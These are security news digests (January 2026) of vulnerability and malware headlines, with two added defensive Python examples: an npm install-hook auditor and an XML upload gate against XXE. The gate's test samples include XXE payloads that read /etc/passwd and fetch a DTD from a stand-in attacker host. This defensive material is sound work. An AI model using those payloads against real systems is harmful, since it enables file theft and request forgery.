Our Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Buried in that data: two distinct campaigns that reveal how threat actors are systematically mapping the expanding surface area of AI deployments.
---------------------------------------------
https://www.greynoise.io/blog/threat-actors-actively-targeting-llms
∗∗∗ Do Smart People Ever Say They’re Smart? (SmarterTools SmarterMail Pre-Auth RCE CVE-2025-52691) ∗∗∗
---------------------------------------------
Welcome to 2026! While we are all waiting for the scheduled SSLVPN ITW exploitation programming that occurs every January, we’re back from Christmas and idle hands, idle minds, yada yada. In December, we were alerted to a vulnerability in SmarterTools’ SmarterMail solution, accompanied by an advisory from Singapore’s Cyber Security Agency (CSA) - CVE-2025-52691, a pre-auth RCE that obtained full marks (10/10) on the industry’s scale.
---------------------------------------------
https://labs.watchtowr.com/do-smart-people-ever-say-theyre-smart-smartertoo…
∗∗∗ Fake Windows Update and BSOD Alerts Used in a Tech Support Scam ∗∗∗
---------------------------------------------
While reviewing submissions received through the WordPress feedback form on my website, I came across a URL that initially appeared unremarkable. Such submissions are common and often contain benign questions or comments, but this particular link stood out enough to warrant closer inspection.
---------------------------------------------
https://malwr-analysis.com/2026/01/09/fake-windows-update-and-bsod-alerts-u…
=====================
= Vulnerabilities =
=====================
∗∗∗ VU#361400: BeeS Software Solutions BeeS Examination Tool (BET) portal contains SQL injection vulnerability ∗∗∗
---------------------------------------------
The BeeS Examination Tool (BET) portal from BeeS Software Solutions contains an SQL injection vulnerability in its website login functionality. More than 100 universities use the BET portal for test administration and other academic tasks.
---------------------------------------------
https://kb.cert.org/vuls/id/361400
∗∗∗ RICOH Streamline NX vulnerable to improper authorization ∗∗∗
---------------------------------------------
RICOH Streamline NX provided by Ricoh Company, Ltd. contains an improper authorization vulnerability.
---------------------------------------------
https://jvn.jp/en/jp/JVN12770174/
∗∗∗ Trend Micro Apex Central RCE Flaw Scores 9.8 CVSS in On-Prem Windows Versions ∗∗∗
---------------------------------------------
Trend Micro has released security updates to address multiple security vulnerabilities impacting on-premise versions of Apex Central for Windows, including a critical bug that could result in arbitrary code execution. The vulnerability, tracked as CVE-2025-69258, carries a CVSS score of 9.8 out of a maximum of 10.0.
---------------------------------------------
https://thehackernews.com/2026/01/trend-micro-apex-central-rce-flaw.html
∗∗∗ VLC media player: updated version plugs numerous holes ∗∗∗
---------------------------------------------
Version 3.0.23 of VLC Media Player fixes various vulnerabilities that may allow the injection of malicious code.
---------------------------------------------
https://www.heise.de/news/VLC-stopft-diverse-Sicherheitslecks-11135921.html
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (pdfminer and vlc), Red Hat (kernel, kernel-rt, and microcode_ctl), Slackware (libtasn1), SUSE (apptainer, curl, ImageMagick, libpcap, libvirt, libwget4, php8, podman, python311-cbor2, qemu, and rsync), and Ubuntu (gnupg, gnupg2, gpsd, libsodium, and python-tornado).
---------------------------------------------
https://lwn.net/Articles/1053492/
∗∗∗ Hitachi Energy Asset Suite ∗∗∗
---------------------------------------------
Hitachi Energy is aware of a Jasper Report vulnerability that affects the Asset Suite product versions mentioned in this document below. This vulnerability can be exploited to carry out a remote code execution (RCE) attack on the product. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation.
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-26-008-01
∗∗∗ K000159018: Linux kernel vulnerability CVE-2023-53178 ∗∗∗
---------------------------------------------
A local unprivileged user may exploit this vulnerability and cause data integrity issues or system instability under specific conditions.
---------------------------------------------
https://my.f5.com/manage/s/article/K000159018
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 07-01-2026 18:00 − Thursday 08-01-2026 18:00
Handler: Felician Fuchs
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New GoBruteforcer attack wave targets crypto, blockchain projects ∗∗∗
---------------------------------------------
A new wave of GoBruteforcer botnet malware attacks is targeting databases of cryptocurrency and blockchain projects on exposed servers believed to be configured using AI-generated examples.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-gobruteforcer-attack-wav…
∗∗∗ Cisco warns of Identity Service Engine flaw with exploit code ∗∗∗
---------------------------------------------
Cisco has patched an ISE vulnerability with public proof-of-concept exploit code that can be abused by attackers with admin privileges.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisco-warns-of-identity-serv…
∗∗∗ Enable MFA urgently: massive amounts of data exfiltrated from cloud instances ∗∗∗
---------------------------------------------
Affected are self-hosted instances of Owncloud, Nextcloud and Sharefile. Data from 50 organisations is up for sale because MFA was not enabled.
---------------------------------------------
https://www.golem.de/news/dringend-mfa-aktivieren-massenhaft-daten-aus-clou…
∗∗∗ NIS 2 implementation: BSI opens reporting portal on Amazon servers ∗∗∗
---------------------------------------------
Almost 30,000 companies and public bodies in critical infrastructure must register with the BSI. The portal runs on AWS cloud services.
---------------------------------------------
https://www.golem.de/news/nis-2-umsetzung-bsi-schaltet-meldeportal-auf-amaz…
∗∗∗ BSI warns: 40 percent of German Zimbra servers are vulnerable to attack ∗∗∗
---------------------------------------------
A large proportion of all Zimbra servers in Germany still run an outdated version that is susceptible to dangerous security vulnerabilities.
---------------------------------------------
https://www.golem.de/news/bsi-warnt-40-prozent-der-deutschen-zimbra-server-…
∗∗∗ Fake Browser Updates Targeting WordPress Administrators via Malicious Plugin ∗∗∗
---------------------------------------------
We recently investigated a case involving a WordPress website where a customer reported persistent fake pop-up notifications appearing on their site. The warnings were urging them to update their browser (Chrome or Firefox), even though their software was already fully up-to-date.
---------------------------------------------
https://blog.sucuri.net/2026/01/fake-browser-updates-targeting-wordpress-ad…
∗∗∗ CISA Flags Microsoft Office and HPE OneView Bugs as Actively Exploited ∗∗∗
---------------------------------------------
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added two security flaws impacting Microsoft Office and Hewlett Packard Enterprise (HPE) OneView to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.
---------------------------------------------
https://thehackernews.com/2026/01/cisa-flags-microsoft-office-and-hpe.html
∗∗∗ Researchers Uncover NodeCordRAT Hidden in npm Bitcoin-Themed Packages ∗∗∗
---------------------------------------------
Cybersecurity researchers have discovered three malicious npm packages that are designed to deliver a previously undocumented malware called NodeCordRAT.
---------------------------------------------
https://thehackernews.com/2026/01/researchers-uncover-nodecordrat-hidden.ht…
∗∗∗ IBM's AI agent Bob easily duped to run malware, researchers show ∗∗∗
---------------------------------------------
Prompt injection lets risky commands slip past guardrails. IBM describes its coding agent thus: "Bob is your AI software development partner that understands your intent, repo, and security standards." Unfortunately, Bob doesn't always follow those security standards.
---------------------------------------------
https://www.theregister.com/2026/01/07/ibm_bob_vulnerability/
∗∗∗ Together against cybercrime: information campaign on ESC ticket purchases ∗∗∗
---------------------------------------------
Ahead of the start of the first ticket sales wave on 13 January, ORF, EBU, BMI, the City of Vienna, the police and "Watchlist Internet" are raising awareness of cyber threats and setting up a central reporting point for fraud attempts.
---------------------------------------------
https://www.watchlist-internet.at/news/gemeinsam-gegen-cyber-kriminalitaet-…
∗∗∗ Stalkerware operator pleads guilty in rare prosecution ∗∗∗
---------------------------------------------
The owner of a Michigan-based stalkerware company pleaded guilty to federal charges for selling a product designed to spy on people without their consent.
---------------------------------------------
https://therecord.media/stalkerware-guilty-plea-fleming
∗∗∗ Fake ChatGPT and DeepSeek Extensions Spied on Over 1 Million Chrome Users ∗∗∗
---------------------------------------------
Security researchers have identified two malicious Chrome extensions recording AI chats. Learn how to identify and remove these tools to protect your privacy.
---------------------------------------------
https://hackread.com/fake-chatgpt-deepseek-extensions-spy-chrome-users/
∗∗∗ Discord Controlled NodeCordRAT Steals Chrome Data via NPM Packages ∗∗∗
---------------------------------------------
Zscaler ThreatLabz identifies three malicious NPM packages mimicking Bitcoin libraries. The NodeCordRAT virus uses Discord commands to exfiltrate MetaMask data and Chrome passwords.
---------------------------------------------
https://hackread.com/discord-nodecordrat-steal-chrome-data-npm-packages/
∗∗∗ The Ransomware Ground Game: How A Christmas Scanning Campaign Will Fuel 2026 Attacks ∗∗∗
---------------------------------------------
Over four days in December, one operator scanned the internet with 240+ exploits, logging confirmed vulnerabilities that could power targeted intrusions in 2026.
---------------------------------------------
https://www.greynoise.io/blog/christmas-scanning-campaign-fuel-2026-attacks
∗∗∗ Decoding the GitHub recommendations for npm maintainers ∗∗∗
---------------------------------------------
This blog post explores the rationale and implementation behind GitHub's security recommendations for npm maintainers following numerous high-profile supply-chain incidents. It details how hardening publishing infrastructure through trusted publishing, enforced two-factor authentication, and WebAuthn-based protocols can meaningfully increase the resilience of the ecosystem.
---------------------------------------------
https://securitylabs.datadoghq.com/articles/decoding-the-recommendations-fo…
∗∗∗ Abusing ROPC to Bypass MFA — and How I Built a Detection for It in Microsoft Sentinel ∗∗∗
---------------------------------------------
Among all the OAuth2 grant types available in Azure AD (now Microsoft Entra ID), the Resource Owner Password Credential (ROPC) flow remains one of the most misunderstood — and most abused.
---------------------------------------------
https://detect.fyi/abusing-ropc-to-bypass-mfa-and-how-i-built-a-detection-f…
∗∗∗ Preparing for Post-Quantum Cryptography ∗∗∗
---------------------------------------------
Learn what you can do today to prepare for Q-Day.
---------------------------------------------
https://www.wiz.io/blog/preparing-for-post-quantum-cryptography
∗∗∗ npm to Implement Staged Publishing After Turbulent Shift Off Classic Tokens ∗∗∗
---------------------------------------------
The JavaScript ecosystem spent much of 2025 responding to a sustained run of supply chain attacks, but it was the multi-wave Shai-Hulud campaign that ultimately reset expectations for what large-scale, automated compromise looks like. By the end of the year, organizations with JavaScript-heavy infrastructure were no longer treating supply chain malware as an edge case, but as an operational risk that could spread faster than human review. Now, npm says it is preparing its next major response.
---------------------------------------------
https://socket.dev/blog/npm-to-implement-staged-publishing
∗∗∗ Crimson Collective Claims to Disconnect Brightspeed Internet Users After Hack ∗∗∗
---------------------------------------------
The hacking group Crimson Collective claims to have access to Brightspeed’s infrastructure and is disconnecting users from the company’s home internet services. The group made its latest claims in a post on Telegram yesterday. “Hey BrightSpeed, we disconnected alot of your users home internet.. they might be complaining you should check,” the Telegram post says.
---------------------------------------------
https://thecyberexpress.com/crimson-collective-disconnects-brightspeed/
∗∗∗ Trump Orders US Exit from Global Cyber and Hybrid Threat Coalitions ∗∗∗
---------------------------------------------
President Donald Trump has ordered the immediate withdrawal of the United States from several premier international bodies dedicated to cybersecurity, digital human rights, and countering hybrid warfare, as part of a major restructuring of American defense and diplomatic posture.
---------------------------------------------
https://thecyberexpress.com/trump-orders-us-exit-from-cyber-coalitions/
∗∗∗ UK Moves to Close Public Sector Cyber Gaps With Government Cyber Action Plan ∗∗∗
---------------------------------------------
The UK government has revealed the Government Cyber Action Plan as a renewed effort to close the growing gap between escalating cyber threats and the public sector’s ability to respond effectively. The move comes amid a series of cyberattacks targeting UK retail and manufacturing sectors, incidents that have underscored broader vulnerabilities affecting critical services and government operations.
---------------------------------------------
https://thecyberexpress.com/uk-government-cyber-action-plan/
=====================
= Vulnerabilities =
=====================
∗∗∗ Max severity Ni8mare flaw lets hackers hijack n8n servers ∗∗∗
---------------------------------------------
A maximum severity vulnerability dubbed "Ni8mare" allows remote, unauthenticated attackers to take control over locally deployed instances of the N8N workflow automation platform.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/max-severity-ni8mare-flaw-le…
∗∗∗ Critical jsPDF flaw lets hackers steal secrets via generated PDFs ∗∗∗
---------------------------------------------
The jsPDF library for generating PDF documents in JavaScript applications contains a critical vulnerability that allows an attacker to steal sensitive data from the local filesystem by including it in generated files.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/critical-jspdf-flaw-lets-hac…
∗∗∗ The installers for multiple PIONEER products may insecurely load Dynamic Link Libraries ∗∗∗
---------------------------------------------
The installers for multiple products provided by PIONEER CORPORATION may insecurely load Dynamic Link Libraries. Arbitrary code may be executed with the privileges of the running installer.
---------------------------------------------
https://jvn.jp/en/jp/JVN17956874/
∗∗∗ zlib: critical vulnerability allows code injection – no update yet ∗∗∗
---------------------------------------------
IT researchers have discovered a critical vulnerability in a tool belonging to the zlib compression library, which is included in numerous programs and operating systems. Under certain circumstances it allows malicious code to be injected and executed. There is no update yet to close the security hole.
---------------------------------------------
https://www.heise.de/news/zlib-Kritische-Sicherheitsluecke-ermoeglicht-Code…
∗∗∗ Seven critical vulnerabilities with maximum rating threaten Coolify ∗∗∗
---------------------------------------------
Admins of platform-as-a-service environments based on Coolify should bring their instances up to date promptly. Otherwise attackers can, among other things, leverage seven "critical" vulnerabilities with the maximum rating (CVSS score 10 out of 10) to fully compromise servers.
---------------------------------------------
https://www.heise.de/news/Sieben-kritische-Sicherheitsluecken-mit-Hoechstwe…
∗∗∗ Kanboard vulnerability allows login as any user ∗∗∗
---------------------------------------------
The open-source Kanban tool Kanboard is affected by three vulnerabilities. The developers rate one of them as a critical risk: it allows logging in as any user, provided a certain configuration option is set.
---------------------------------------------
https://www.heise.de/news/Kanboard-Sicherheitsluecke-ermoeglicht-Anmeldung-…
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (gcc-toolset-14-binutils, gcc-toolset-15-binutils, httpd, kernel, libpng, mariadb, mingw-libpng, poppler, python3.12, and ruby:3.3), Debian (foomuuri and libsodium), Fedora (python-pdfminer and wget2), Oracle (audiofile, bind, gcc-toolset-15-binutils, libpng, mariadb, mariadb10.11, mariadb:10.11, mariadb:10.5, mingw-libpng, poppler, and python3.12), Red Hat (git-lfs, kernel, libpng, libpq, mariadb:10.3, osbuild-composer, postgresql, postgresql:13, and postgresql:15), Slackware (curl), SUSE (c-ares-devel, capstone, curl, gpsd, ImageMagick, libpcap, log4j, python311-filelock, and python314), and Ubuntu (libcaca, libxslt, and net-snmp).
---------------------------------------------
https://lwn.net/Articles/1053277/
∗∗∗ [R1] Nessus Agent Versions 11.0.3 and 10.9.3 Fix One Vulnerability ∗∗∗
---------------------------------------------
A vulnerability has been identified in the installation/uninstallation of the Nessus Agent Tray App on Windows Hosts which could lead to escalation of privileges. Tenable has released Nessus Agent 11.0.3 and Nessus Agent 10.9.3 to address these issues.
---------------------------------------------
https://www.tenable.com/security/tns-2026-01
∗∗∗ CVE-2025-42877: Memory Corruption in SAP Web Dispatcher ∗∗∗
---------------------------------------------
SAP Web Dispatcher and Internet Communication Manager (ICM) contain a critical memory corruption vulnerability in the HTTP header parsing function. The vulnerability allows an unauthenticated attacker to cause heap corruption and lead to Denial of Service through specially crafted HTTP requests.
---------------------------------------------
https://redrays.io/blog/cve-2025-42877-sap-web-dispatcher-memory-corruption…
∗∗∗ Case opened: DIVD-2025-00011 - Severe vulnerabilities in Growatt portal ∗∗∗
---------------------------------------------
https://csirt.divd.nl/cases/DIVD-2025-00011/
=====================
= End-of-Day report =
=====================
Timeframe: Monday 05-01-2026 18:00 − Wednesday 07-01-2026 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ New D-Link flaw in legacy DSL routers actively exploited in attacks ∗∗∗
---------------------------------------------
Threat actors are exploiting a recently discovered command injection vulnerability that affects multiple D-Link DSL gateway routers that went out of support years ago.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-d-link-flaw-in-legacy-ds…
∗∗∗ ownCloud urges users to enable MFA after credential theft reports ∗∗∗
---------------------------------------------
File-sharing platform ownCloud warned users today to enable multi-factor authentication (MFA) to block attackers using compromised credentials from stealing their data.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/owncloud-urges-users-to-enab…
∗∗∗ Microsoft: Classic Outlook bug prevents opening encrypted emails ∗∗∗
---------------------------------------------
Microsoft has confirmed a known issue that prevents recipients from opening encrypted emails in classic Outlook.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/microsoft-classic-outlook-b…
∗∗∗ Founder of Spyware Maker PcTattletale Pleads Guilty To Hacking, Advertising Surveillance Software ∗∗∗
---------------------------------------------
An anonymous reader quotes a report from TechCrunch: The founder of a U.S.-based spyware company, whose surveillance products allowed customers to spy on the phones and computers of unsuspecting victims, pleaded guilty to federal charges linked to his long-running operation. pcTattletale founder Bryan Fleming entered a guilty plea in a San Diego federal ..
---------------------------------------------
https://yro.slashdot.org/story/26/01/07/0033238/founder-of-spyware-maker-pc…
∗∗∗ UK injects just £210M into cyber plan to stop Whitehall getting pwnd ∗∗∗
---------------------------------------------
Central government will supposedly be as secure as energy facilities and datacenters under new proposals The UK today launches its Government Cyber Action Plan, committing £210 million ($282 million) to strengthen defenses across digital public services and hold itself to the same cybersecurity standards it's imposing on critical infrastructure operators.
---------------------------------------------
https://www.theregister.com/2026/01/06/government_cyber_action_plan/
∗∗∗ Malicious NPM Packages Deliver NodeCordRAT ∗∗∗
---------------------------------------------
Zscaler ThreatLabz regularly monitors the npm database for suspicious packages. In November 2025, ThreatLabz identified three malicious packages: bitcoin-main-lib, bitcoin-lib-js, and bip40. The bitcoin-main-lib and bitcoin-lib-js packages execute a postinstall.cjs script during installation, which installs bip40, the package that contains the ..
---------------------------------------------
https://www.zscaler.com/blogs/security-research/malicious-npm-packages-deli…
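The excerpt describes the delivery mechanism: a postinstall hook in two decoy packages installs the package that carries the payload, so the code runs at `npm install` time, before anyone ever imports the library. The audit step below is an added example for this digest, not Zscaler's tooling and not part of the original report. It is written in Python so it can run as a standalone CI check over a node_modules tree; the manifests in SAMPLE_MANIFESTS are constructed for illustration (the two names from the excerpt are given a postinstall hook matching the described behaviour, the other two packages are hypothetical), not the real package contents.

```python
"""Added audit step for this digest: list every installed npm package that
declares an install-time lifecycle script, the mechanism the decoy packages
above used to pull in the payload package. Written in Python so it runs as a
standalone CI check; not Zscaler's tooling. The manifests in SAMPLE_MANIFESTS
are constructed for illustration, not the real package contents."""

import json
import os

# Hooks npm runs automatically when a dependency is installed from the registry.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# File extensions that indicate the hook executes code shipped inside the package.
SCRIPT_SUFFIXES = (".js", ".cjs", ".mjs", ".sh")


def install_scripts(manifest: dict) -> dict[str, str]:
    """Install-time scripts declared in one package.json (empty for most packages)."""
    scripts = manifest.get("scripts") or {}
    return {hook: cmd for hook, cmd in scripts.items() if hook in INSTALL_HOOKS}


def runs_bundled_file(command: str) -> bool:
    """Heuristic: the command runs a script file from the package (e.g. `node postinstall.cjs`)
    rather than a build tool invoked by name (e.g. `node-gyp rebuild`)."""
    tokens = command.replace("&&", " ").replace("||", " ").replace(";", " ").split()
    return any(tok.endswith(SCRIPT_SUFFIXES) for tok in tokens)


def audit(manifests: dict[str, dict]) -> list[dict]:
    """One finding per (package, hook); packages without install hooks produce none."""
    findings = []
    for path, manifest in sorted(manifests.items()):
        for hook, cmd in install_scripts(manifest).items():
            findings.append({
                "package": manifest.get("name", path),
                "version": manifest.get("version", "?"),
                "hook": hook,
                "command": cmd,
                "runs_bundled_file": runs_bundled_file(cmd),
            })
    return findings


def load_node_modules(root: str) -> dict[str, dict]:
    """Collect every package.json under a node_modules tree, including scoped and nested packages."""
    manifests = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), "rb") as fh:
                manifests[os.path.relpath(dirpath, root)] = json.load(fh)
        except ValueError:
            continue  # unparsable manifest: not something npm installed
    return manifests


# Constructed manifests. The two names from the excerpt are given the behaviour it
# describes (a postinstall hook running a bundled script); the other two are hypothetical.
SAMPLE_MANIFESTS = {
    "bitcoin-main-lib": {"name": "bitcoin-main-lib", "version": "1.0.0",
                         "scripts": {"postinstall": "node postinstall.cjs"}},
    "bip40": {"name": "bip40", "version": "1.0.0", "main": "index.js"},
    "native-addon-demo": {"name": "native-addon-demo", "version": "2.1.0",
                          "scripts": {"install": "node-gyp rebuild", "test": "jest"}},
    "plain-leaf": {"name": "plain-leaf", "version": "0.3.2"},
}

if __name__ == "__main__":
    import sys
    manifests = load_node_modules(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_MANIFESTS
    for f in audit(manifests):
        flag = "!!" if f["runs_bundled_file"] else "  "
        print(f"{flag} {f['package']}@{f['version']} {f['hook']}: {f['command']}")
```

Run it against a real tree by passing the node_modules path as the first argument; with no argument it audits the constructed sample. The complementary control is to stop hooks from running at all (`npm install --ignore-scripts`, or `npm config set ignore-scripts true` in CI) and then build the few native addons that genuinely need an install hook explicitly, so that a new package acquiring a postinstall script becomes a visible change rather than silent code execution.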
∗∗∗ CISA catalog of exploited vulnerabilities grew by 20 percent in 2025 ∗∗∗
---------------------------------------------
The US cybersecurity agency CISA maintains a catalog of vulnerabilities that have been attacked. In 2025 it grew somewhat faster.
---------------------------------------------
https://www.heise.de/news/CISA-Katalog-attackierter-Schwachstellen-wuchs-20…
∗∗∗ Patchday: Dolby Digital security vulnerability in Android closed ∗∗∗
---------------------------------------------
Android devices are vulnerable to a zero-click attack. This security problem has now been fixed.
---------------------------------------------
https://www.heise.de/news/Patchday-Dolby-Digital-Sicherheitsluecke-in-Andro…
∗∗∗ Ubiquiti UniFi Protect: security vulnerability allows access to cameras ∗∗∗
---------------------------------------------
In the UniFi Protect Application, attackers can abuse vulnerabilities for unauthorised access to cameras and for DoS attacks.
---------------------------------------------
https://www.heise.de/news/Ubiquiti-UniFi-Protect-Sicherheitsluecke-ermoegli…
∗∗∗ Multiple security vulnerabilities threaten Veeam Backup & Replication ∗∗∗
---------------------------------------------
An important security update closes several vulnerabilities in Veeam Backup & Replication. No attacks are known so far.
---------------------------------------------
https://www.heise.de/news/Mehrere-Sicherheitsluecken-bedrohen-Veeam-Back-Re…
∗∗∗ Crypto phishing with a fake e-mail from the Bundeszentralamt für Steuern ∗∗∗
---------------------------------------------
A current phishing wave claims discrepancies in "crypto declarations" at the Bundeszentralamt für Steuern (the German Federal Central Tax Office).
---------------------------------------------
https://www.heise.de/news/Krypto-Phishing-mit-angeblicher-Mail-des-Bundesze…
∗∗∗ 2025, the year of the Infostealer ∗∗∗
---------------------------------------------
Infostealers are not new malware. They have been around for decades. What has changed is how effective they have become, and how easily they blend into normal user behaviour. In 2025, infostealers became the fastest growing malware category, overtaking ransomware in terms of deployment and spread. The H1 2025 reports highlighted a sharp rise in simple ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostea…
∗∗∗ Russian hackers target European hospitality industry with ‘blue screen of death’ malware ∗∗∗
---------------------------------------------
The scheme starts with a fake reservation cancellation that impersonates a popular booking site, and eventually prompts victims with an error message and “Blue Screen of Death” page.
---------------------------------------------
https://therecord.media/russian-hackers-europe-hospitality-blue-screen
∗∗∗ Alleged cyber scam kingpin arrested, extradited to China ∗∗∗
---------------------------------------------
Chen Zhi’s arrest is the latest chapter in the remarkable downfall of one of the country’s most prominent businesses, with holdings in the real estate, banking, entertainment and airline industries.
---------------------------------------------
https://therecord.media/alleged-cyber-scam-kingpin-cambodia-arrested-extrad…
∗∗∗ Analysis of a Fake Cloudflare Turnstile Used as a Traffic Filtering Gate ∗∗∗
---------------------------------------------
During analysis of a phishing URL chain, I observed a fake Cloudflare Turnstile verification page acting as an intelligent traffic filtering gate. Rather than protecting a website, this page selectively blocks, redirects, or allows access based on geolocation, proxy usage, and browser fingerprinting. This phishing infrastructure demonstrates Traffic Distribution System like behavior ..
---------------------------------------------
https://malwr-analysis.com/2026/01/07/analysis-of-a-fake-cloudflare-turnsti…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Identity Services Engine XML External Entity Processing Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the licensing features of Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker with administrative privileges to gain access to sensitive information. This vulnerability is due to improper parsing of XML that is processed by the web-based management interface of Cisco ISE and Cisco ISE-PIC. An attacker could exploit this vulnerability by uploading a malicious file to ..
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
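The advisory excerpt describes the classic XML external entity (XXE) shape: an uploaded file is handed to a component that honours entity declarations, so a DTD inside the file can make the parser read local files or contact external hosts. The code below is an added example for this digest, generic and not Cisco ISE's code; nothing in it reflects ISE internals. It shows the gate an upload handler should apply before user-supplied XML reaches a full parser: refuse the document if it declares a DOCTYPE at all, whether an internal subset or a SYSTEM/PUBLIC reference. The licence-file samples and the `dtd.attacker.example` host are constructed.

```python
"""Added example for this digest of the upload-side gate against XML external
entity (XXE) injection: refuse any document that declares a DTD before it
reaches a real parser. Generic code, not Cisco ISE's; the licence samples
below are constructed."""

import xml.parsers.expat
from xml.etree import ElementTree as ET


class UnsafeXML(ValueError):
    """Uploaded XML declares a DOCTYPE (and therefore may declare entities)."""


def reject_dtd(data: bytes) -> None:
    """Throw-away expat pass that aborts on the first DOCTYPE declaration.

    Entities can only be declared inside a DTD, either in the internal subset
    (<!DOCTYPE x [ <!ENTITY ...> ]>) or in an external one referenced via
    SYSTEM/PUBLIC, so rejecting every DOCTYPE covers local file disclosure,
    SSRF via external DTDs and entity-expansion bombs alike. Data uploads
    never need one.
    """
    parser = xml.parsers.expat.ParserCreate()
    # Belt and braces: never fetch parameter entities even if the handler were removed.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(
            f"DOCTYPE {name!r} rejected (system id={sysid!r}, "
            f"internal subset={bool(has_internal_subset)})"
        )

    parser.StartDoctypeDeclHandler = on_doctype
    # UnsafeXML raised in the handler propagates out of Parse(); malformed input
    # raises xml.parsers.expat.ExpatError instead.
    parser.Parse(data, True)


def is_safe_upload(data: bytes) -> bool:
    """True only for well-formed XML without any DTD."""
    try:
        reject_dtd(data)
    except (UnsafeXML, xml.parsers.expat.ExpatError):
        return False
    return True


def parse_upload(data: bytes) -> dict:
    """Gate first, then parse. Returns the top-level fields of the document."""
    reject_dtd(data)
    root = ET.fromstring(data)
    return {child.tag: (child.text or "") for child in root}


# Constructed samples: a benign licence file, a classic file-read XXE and an external DTD.
BENIGN = b"""<?xml version="1.0"?>
<license><product>ise</product><seats>50</seats></license>"""

XXE_LOCAL_FILE = b"""<?xml version="1.0"?>
<!DOCTYPE license [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<license><product>&xxe;</product><seats>50</seats></license>"""

XXE_EXTERNAL_DTD = b"""<?xml version="1.0"?>
<!DOCTYPE license SYSTEM "http://dtd.attacker.example/license.dtd">
<license><product>ise</product><seats>50</seats></license>"""

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("local file", XXE_LOCAL_FILE),
                       ("external DTD", XXE_EXTERNAL_DTD)):
        print(f"{label:13s} safe={is_safe_upload(doc)}")
    print(parse_upload(BENIGN))
```

The gate is deliberately independent of how the downstream parser is configured: Python's stdlib expat parsers do not fetch external entities by default, but defaults differ between XML libraries and versions, and the privileged-admin-only precondition in the advisory is exactly the kind of trust boundary that should not rest on a parser default.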
∗∗∗ Multiple Cisco Products Snort 3 Distributed Computing Environment/Remote Procedure Call Vulnerabilities ∗∗∗
---------------------------------------------
Multiple Cisco products are affected by vulnerabilities in the processing of Distributed Computing Environment Remote Procedure Call (DCE/RPC) requests that could allow an unauthenticated, remote attacker to cause the Snort 3 Detection Engine to leak sensitive information or to restart, which would result in an interruption of packet inspection. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address ..
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ [20260101] - Core - Inadequate content filtering for data URLs ∗∗∗
---------------------------------------------
https://developer.joomla.org/security-centre/1016-20260101-core-inadequate-…
∗∗∗ [20260102] - Core - XSS vector in the pagebreak plugin ∗∗∗
---------------------------------------------
https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-…
∗∗∗ [20260102] - Core - XSS vectors in the pagebreak and pagenavigation plugins ∗∗∗
---------------------------------------------
https://developer.joomla.org/security-centre/1017-20260102-core-xss-vector-…
=====================
= End-of-Day report =
=====================
Timeframe: Friday 02-01-2026 18:00 − Monday 05-01-2026 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hackers claim to hack Resecurity, firm says it was a honeypot ∗∗∗
---------------------------------------------
The ShinyHunters hacking group claims it breached the systems of cybersecurity firm Resecurity and stole internal data, while Resecurity says the attackers only accessed a deliberately deployed honeypot containing fake information used to monitor their activity.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-claim-resecurity-hac…
∗∗∗ How to Protect Your iPhone or Android Device From Spyware ∗∗∗
---------------------------------------------
Being targeted by sophisticated spyware is relatively rare, but experts say that everyone needs to stay vigilant as this dangerous malware continues to proliferate worldwide.
---------------------------------------------
https://www.wired.com/story/how-to-protect-your-iphone-or-android-device-fr…
∗∗∗ Plex Media Server: access vulnerabilities still unpatched ∗∗∗
---------------------------------------------
Plex Media Server has security holes through which attackers can gain unauthorised access. Updates are still outstanding.
---------------------------------------------
https://www.heise.de/news/Plex-Media-Server-Noch-ungepatchte-Zugriffsschwac…
∗∗∗ MongoBleed scanner for admins ∗∗∗
---------------------------------------------
Many MongoDB instances are or were potentially vulnerable to MongoBleed. A tool helps analyse servers for traces of attacks.
---------------------------------------------
https://www.heise.de/news/MongoBleed-Scanner-fuer-Admins-11129291.html
∗∗∗ Taiwan: 2.6 million Chinese cyberattacks per day ∗∗∗
---------------------------------------------
According to Taiwan, the attacks took place in close temporal proximity to military exercises. China denies this.
---------------------------------------------
https://www.derstandard.at/story/3000000302832/taiwan-26-millionen-cyberang…
∗∗∗ Current attacks against an old vulnerability in Fortinet devices (CVE-2020-12812) ∗∗∗
---------------------------------------------
